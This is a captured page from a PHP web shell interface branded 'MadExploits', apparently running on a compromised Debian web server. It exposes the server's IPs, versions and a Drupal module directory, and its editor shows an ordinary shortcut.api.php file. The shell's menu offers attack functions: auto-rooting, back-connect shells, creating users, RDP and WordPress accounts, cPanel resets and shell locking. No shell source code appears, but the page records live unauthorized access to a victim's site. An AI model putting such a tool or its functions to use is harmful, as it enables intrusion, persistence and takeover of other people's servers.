Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.118.144.239
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
shortcut /
[ HOME SHELL ]
Name
Size
Permission
Action
shortcut-rtl.css
1.04
KB
-rw-r--r--
shortcut.admin.css
104
B
-rw-r--r--
shortcut.admin.inc
26.25
KB
-rw-r--r--
shortcut.admin.js
4.38
KB
-rw-r--r--
shortcut.api.php
1.21
KB
-rw-r--r--
shortcut.css
2.35
KB
-rw-r--r--
shortcut.info
336
B
-rw-r--r--
shortcut.install
2.98
KB
-rw-r--r--
shortcut.module
26.56
KB
-rw-r--r--
shortcut.png
558
B
-rw-r--r--
shortcut.test
13.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shortcut.api.php
<?php /** * @file * Hooks provided by the Shortcut module. */ /** * @addtogroup hooks * @{ */ /** * Return the name of a default shortcut set for the provided user account. * * This hook allows modules to define default shortcut sets for a particular * user that differ from the site-wide default (for example, a module may want * to define default shortcuts on a per-role basis). * * The default shortcut set is used only when the user does not have any other * shortcut set explicitly assigned to them. * * Note that only one default shortcut set can exist per user, so when multiple * modules implement this hook, the last (i.e., highest weighted) module which * returns a valid shortcut set name will prevail. * * @param $account * The user account whose default shortcut set is being requested. * @return * The name of the shortcut set that this module recommends for that user, if * there is one. */ function hook_shortcut_default_set($account) { // Use a special set of default shortcuts for administrators only. if (in_array(variable_get('user_admin_role', 0), $account->roles)) { return variable_get('mymodule_shortcut_admin_default_set'); } } /** * @} End of "addtogroup hooks". */
Close